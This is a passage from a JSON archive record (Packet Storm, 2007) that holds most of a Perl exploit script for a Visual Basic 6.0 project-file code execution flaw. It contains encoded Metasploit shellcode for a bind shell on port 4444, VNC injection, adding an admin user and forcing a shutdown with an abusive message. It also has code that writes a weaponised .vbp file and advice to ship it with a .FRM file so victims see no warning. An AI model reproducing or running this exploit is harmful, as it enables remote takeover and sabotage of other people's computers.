\n\"\\x49\\x48\\x47\\x4e\\x4c\\x56\\x46\\x54\\x49\\x48\\x44\\x4e\\x41\\x43\\x42\\x4c\". \n\"\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x54\\x4d\\x52\\x50\\x4f\\x44\\x54\\x4e\\x42\". \n\"\\x43\\x59\\x4d\\x38\\x4c\\x47\\x4a\\x43\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x36\". \n\"\\x44\\x47\\x50\\x4f\\x43\\x4b\\x48\\x41\\x4f\\x4f\\x45\\x47\\x46\\x54\\x4f\\x4f\". \n\"\\x48\\x4d\\x4b\\x45\\x47\\x45\\x44\\x35\\x41\\x35\\x41\\x45\\x41\\x55\\x4c\\x46\". \n\"\\x41\\x30\\x41\\x45\\x41\\x45\\x45\\x45\\x41\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x36\". \n\"\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\\x43\\x45\\x4f\\x4f\\x48\\x4d\\x4c\\x56\". \n\"\\x4f\\x4f\\x4f\\x4f\\x47\\x33\\x4f\\x4f\\x42\\x4d\\x4b\\x48\\x47\\x35\\x4e\\x4f\". \n\"\\x43\\x38\\x46\\x4c\\x46\\x36\\x4f\\x4f\\x48\\x4d\\x44\\x55\\x4f\\x4f\\x42\\x4d\". \n\"\\x4a\\x56\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x55\\x43\\x45\\x4f\\x4f\\x48\\x4d\". \n\"\\x4f\\x4f\\x42\\x4d\\x5a\"; \n \n# win32_bind_vncinject - VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com \n$shellc4 = \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\". \n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\". \n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\". \n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\". \n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4a\\x4e\\x48\\x55\\x42\\x50\". \n\"\\x42\\x30\\x42\\x30\\x43\\x55\\x45\\x35\\x48\\x45\\x47\\x45\\x4b\\x38\\x4e\\x36\". \n\"\\x46\\x42\\x4a\\x31\\x4b\\x38\\x45\\x54\\x4e\\x33\\x4b\\x48\\x46\\x55\\x45\\x30\". \n\"\\x4a\\x47\\x41\\x50\\x4c\\x4e\\x4b\\x58\\x4c\\x54\\x4a\\x31\\x4b\\x48\\x4c\\x55\". \n\"\\x42\\x42\\x41\\x50\\x4b\\x4e\\x43\\x4e\\x44\\x43\\x49\\x54\\x4b\\x58\\x46\\x33\". \n\"\\x4b\\x48\\x41\\x30\\x50\\x4e\\x41\\x33\\x4f\\x4f\\x4e\\x4f\\x41\\x43\\x42\\x4c\". \n\"\\x4e\\x4a\\x4a\\x53\\x42\\x4e\\x46\\x57\\x47\\x30\\x41\\x4c\\x4f\\x4c\\x4d\\x30\". \n\"\\x41\\x30\\x47\\x4c\\x4b\\x4e\\x44\\x4f\\x4b\\x33\\x4e\\x47\\x46\\x42\\x46\\x51\". \n\"\\x45\\x37\\x41\\x4e\\x4b\\x38\\x4c\\x35\\x46\\x52\\x41\\x30\\x4b\\x4e\\x48\\x56\". \n\"\\x4b\\x58\\x4e\\x50\\x4b\\x54\\x4b\\x48\\x4c\\x55\\x4e\\x51\\x41\\x30\\x4b\\x4e\". \n\"\\x4b\\x58\\x46\\x30\\x4b\\x58\\x41\\x50\\x4a\\x4e\\x4b\\x4e\\x44\\x50\\x41\\x43\". \n\"\\x42\\x4c\\x4f\\x35\\x50\\x35\\x4d\\x35\\x4b\\x45\\x44\\x4c\\x4a\\x50\\x42\\x50\". \n\"\\x50\\x55\\x4c\\x36\\x42\\x33\\x49\\x55\\x46\\x46\\x4b\\x58\\x49\\x31\\x4b\\x38\". \n\"\\x4b\\x45\\x4e\\x50\\x4b\\x38\\x4b\\x35\\x4e\\x31\\x4b\\x48\\x4b\\x51\\x4b\\x58\". \n\"\\x4b\\x45\\x4a\\x30\\x43\\x55\\x4a\\x56\\x50\\x38\\x50\\x34\\x50\\x50\\x4e\\x4e\". \n\"\\x4f\\x4f\\x48\\x4d\\x49\\x48\\x47\\x4c\\x41\\x58\\x4e\\x4e\\x42\\x50\\x41\\x50\". \n\"\\x42\\x50\\x42\\x30\\x47\\x45\\x48\\x55\\x43\\x45\\x49\\x38\\x45\\x4e\\x4a\\x4e\". \n\"\\x47\\x52\\x42\\x30\\x42\\x30\\x42\\x30\\x42\\x59\\x41\\x50\\x42\\x30\\x42\\x50\". \n\"\\x48\\x4b\\x49\\x51\\x4a\\x51\\x47\\x4e\\x46\\x4a\\x49\\x31\\x42\\x47\\x49\\x4e\". \n\"\\x45\\x4e\\x49\\x54\\x48\\x58\\x49\\x54\\x46\\x4a\\x4c\\x51\\x42\\x37\\x47\\x4c\". \n\"\\x46\\x4a\\x4d\\x4a\\x50\\x42\\x49\\x4e\\x49\\x4d\\x49\\x50\\x45\\x4f\\x4d\\x4a\". \n\"\\x4b\\x4c\\x4d\\x4e\\x4e\\x4f\\x4b\\x43\\x47\\x45\\x43\\x35\\x44\\x33\\x4f\\x45\". \n\"\\x43\\x33\\x44\\x43\\x42\\x30\\x4b\\x45\\x4d\\x38\\x4b\\x34\\x42\\x42\\x41\\x55\". \n\"\\x4f\\x4f\\x47\\x4d\\x49\\x58\\x4f\\x4d\\x49\\x38\\x43\\x4c\\x4d\\x58\\x45\\x47\". \n\"\\x46\\x41\\x4c\\x36\\x47\\x30\\x49\\x45\\x41\\x35\\x43\\x45\\x4f\\x4f\\x46\\x43\". \n\"\\x4f\\x38\\x4f\\x4f\\x45\\x35\\x46\\x50\\x49\\x35\\x49\\x58\\x46\\x50\\x50\\x48\". \n\"\\x44\\x4e\\x44\\x4f\\x4b\\x32\\x47\\x52\\x46\\x35\\x4f\\x4f\\x47\\x43\\x4f\\x4f\". \n\"\\x45\\x35\\x42\\x43\\x41\\x53\\x42\\x4c\\x42\\x45\\x42\\x35\\x42\\x35\\x42\\x55\". \n\"\\x42\\x54\\x42\\x55\\x42\\x44\\x42\\x35\\x4f\\x4f\\x45\\x45\\x4e\\x32\\x49\\x48\". \n\"\\x47\\x4c\\x41\\x53\\x4b\\x4d\\x43\\x45\\x43\\x45\\x4a\\x46\\x44\\x30\\x42\\x50\". \n\"\\x41\\x31\\x4e\\x55\\x49\\x48\\x42\\x4e\\x4c\\x36\\x42\\x31\\x42\\x35\\x47\\x55\". \n\"\\x4f\\x4f\\x45\\x35\\x46\\x32\\x43\\x55\\x47\\x45\\x4f\\x4f\\x45\\x45\\x4a\\x32\". \n\"\\x43\\x55\\x46\\x35\\x47\\x45\\x4f\\x4f\\x45\\x55\\x42\\x32\\x49\\x48\\x47\\x4c\". \n\"\\x41\\x58\\x4e\\x4e\\x42\\x50\\x42\\x31\\x42\\x50\\x42\\x50\\x49\\x58\\x43\\x4e\". \n\"\\x4c\\x46\\x42\\x50\\x4a\\x46\\x42\\x30\\x42\\x51\\x42\\x30\\x42\\x30\\x43\\x35\". \n\"\\x47\\x45\\x4f\\x4f\\x45\\x35\\x4a\\x31\\x41\\x58\\x4e\\x4e\\x42\\x30\\x46\\x30\". \n\"\\x42\\x30\\x42\\x30\\x4f\\x4f\\x43\\x4d\\x5a\"; \n \n# win32_exec - EXITFUNC=seh CMD=shutdown -c \"HAI VEn0m pwn3d j00r b0x0r wif k0sh1 u b1tch\" Size=451 Encoder=PexAlphaNum http://metasploit.com \n$shellc5 = \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\". \n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\". \n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\". \n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\". \n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34\". \n\"\\x42\\x50\\x42\\x50\\x42\\x30\\x4b\\x38\\x45\\x54\\x4e\\x43\\x4b\\x38\\x4e\\x47\". \n\"\\x45\\x30\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x54\\x4a\\x51\\x4b\\x48\". \n\"\\x4f\\x35\\x42\\x32\\x41\\x50\\x4b\\x4e\\x49\\x54\\x4b\\x38\\x46\\x43\\x4b\\x48\". \n\"\\x41\\x50\\x50\\x4e\\x41\\x53\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x58\\x42\\x4c\". \n\"\\x46\\x47\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x50\\x44\\x4c\\x4b\\x4e\". \n\"\\x46\\x4f\\x4b\\x53\\x46\\x55\\x46\\x32\\x46\\x30\\x45\\x37\\x45\\x4e\\x4b\\x38\". \n\"\\x4f\\x55\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x56\\x4b\\x48\\x4e\\x50\\x4b\\x34\". \n\"\\x4b\\x38\\x4f\\x45\\x4e\\x31\\x41\\x30\\x4b\\x4e\\x4b\\x38\\x4e\\x31\\x4b\\x48\". \n\"\\x41\\x50\\x4b\\x4e\\x49\\x48\\x4e\\x35\\x46\\x32\\x46\\x50\\x43\\x4c\\x41\\x43\". \n\"\\x42\\x4c\\x46\\x56\\x4b\\x48\\x42\\x34\\x42\\x43\\x45\\x58\\x42\\x4c\\x4a\\x37\". \n\"\\x4e\\x50\\x4b\\x38\\x42\\x34\\x4e\\x50\\x4b\\x38\\x42\\x57\\x4e\\x51\\x4d\\x4a\". \n\"\\x4b\\x58\\x4a\\x36\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x58\\x42\\x58\\x42\\x4b\". \n\"\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x48\\x4a\\x46\\x4e\\x43\\x4f\\x45\\x41\\x53\". \n\"\\x48\\x4f\\x42\\x36\\x48\\x35\\x49\\x48\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x37\". \n\"\\x42\\x45\\x4a\\x56\\x42\\x4f\\x4c\\x48\\x46\\x30\\x4f\\x55\\x4a\\x56\\x4a\\x39\". \n\"\\x50\\x4f\\x4c\\x58\\x50\\x50\\x47\\x45\\x4f\\x4f\\x47\\x4e\\x43\\x37\\x4a\\x56\". \n\"\\x45\\x47\\x46\\x37\\x46\\x46\\x4f\\x36\\x47\\x37\\x50\\x46\\x42\\x42\\x4d\\x42\". \n\"\\x43\\x36\\x42\\x42\\x44\\x42\\x4a\\x34\\x41\\x54\\x49\\x34\\x42\\x42\\x48\\x35\". \n\"\\x45\\x34\\x50\\x56\\x42\\x33\\x4d\\x56\\x42\\x52\\x42\\x57\\x47\\x57\\x50\\x56\". \n\"\\x43\\x33\\x46\\x36\\x42\\x32\\x4c\\x46\\x42\\x33\\x42\\x33\\x44\\x37\\x42\\x32\". \n\"\\x44\\x46\\x42\\x53\\x4a\\x57\\x42\\x33\\x44\\x47\\x42\\x52\\x47\\x47\\x49\\x56\". \n\"\\x48\\x46\\x42\\x52\\x4b\\x56\\x42\\x33\\x43\\x57\\x4a\\x56\\x41\\x53\\x42\\x32\". \n\"\\x45\\x37\\x42\\x32\\x44\\x56\\x41\\x43\\x46\\x37\\x43\\x46\\x4a\\x56\\x44\\x32\". \n\"\\x42\\x30\\x5a\"; \n \n$endQuote = \"\\x22\"; \n \n$i = $ARGV[0]; \n \n \nif ($i==1){ \nprint \"$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc1$endQuote$koshi\"; \nexit; \n} \n \n \nif ($i==2){ \nprint \"$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc2$endQuote$koshi\"; \nexit; \n} \n \n \nif ($i==3){ \nprint \"$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc3$endQuote$koshi\"; \nexit; \n} \n \n \nif ($i==4){ \nprint \"$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc4$endQuote$koshi\"; \nexit; \n} \n \n \nif ($i==5){ \nprint \"$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc5$endQuote$koshi\"; \nexit; \n} \n \n \nprint \"\\n\"; \nprint \" ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\"; \nprint \" +++ +++\\n\"; \nprint \" +++ +++\\n\"; \nprint \" +++ Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec +++\\n\"; \nprint \" +++ Written By Koshi +++\\n\"; \nprint \" +++ Greets: Rima my baby! Draven, thanks for helping. +++\\n\"; \nprint \" +++ +++\\n\"; \nprint \" +++ Usage Ex.: ./vb6.pl 1 >>Project1.vbp +++\\n\"; \nprint \" +++ +++\\n\"; \nprint \" +++ Options: +++\\n\"; \nprint \" +++ 1 - win32_exec CALC.EXE +++\\n\"; \nprint \" +++ 2 - win32_adduser Pass=4dmin User=koshi +++\\n\"; \nprint \" +++ 3 - win32_bind Port 4444 +++\\n\"; \nprint \" +++ 4 - win32_bind_vncinject Port 5900 +++\\n\"; \nprint \" +++ 5 - win32_exec shutdown -c \\x22HAI VEn0m pw.. +++\\n\"; \nprint \" +++ +++\\n\"; \nprint \" +++ +++\\n\"; \nprint \" +++ Notes: Ship final .VBP file with a .FRM file to avoid +++\\n\"; \nprint \" +++ warnings in Visual Basic 6.0 +++\\n\"; \nprint \" +++ +++\\n\"; \nprint \" ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\"; \n \n \n \n \n \n \nexit; \n \n \n#EOF \n`\n", "edition": 1, "references": [], "modified": "2007-09-05T00:00:00", "hash": "8f83ac7d6a17623d6a7d1f20f9c6ecffd125220a856d59500181c6ff8b2979a5", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/59048/msvb-codeexec.txt.html", "description": "", "id": "PACKETSTORM:59048", "reporter": "koshi", "lastseen": "2016-11-03T10:22:42", "published": "2007-09-05T00:00:00", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:42"}, "vulnersScore": 7.5}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "msvb-codeexec.txt", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "f75925f0be4a5ea8ed97a19e235545b3", "key": "href"}, {"hash": "bcac6795bfb3f30392c90eb169ded5f4", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "bcac6795bfb3f30392c90eb169ded5f4", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6960c2bb5cca3bbc1faf8a0255a46f2d", "key": "reporter"}, {"hash": "b441e2a31a04626b012680880eb53233", "key": "sourceData"}, {"hash": "c08ec6dacd110159a88e0e519ec59471", "key": "sourceHref"}, {"hash": "680d734d53013107268274ff35978f7f", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}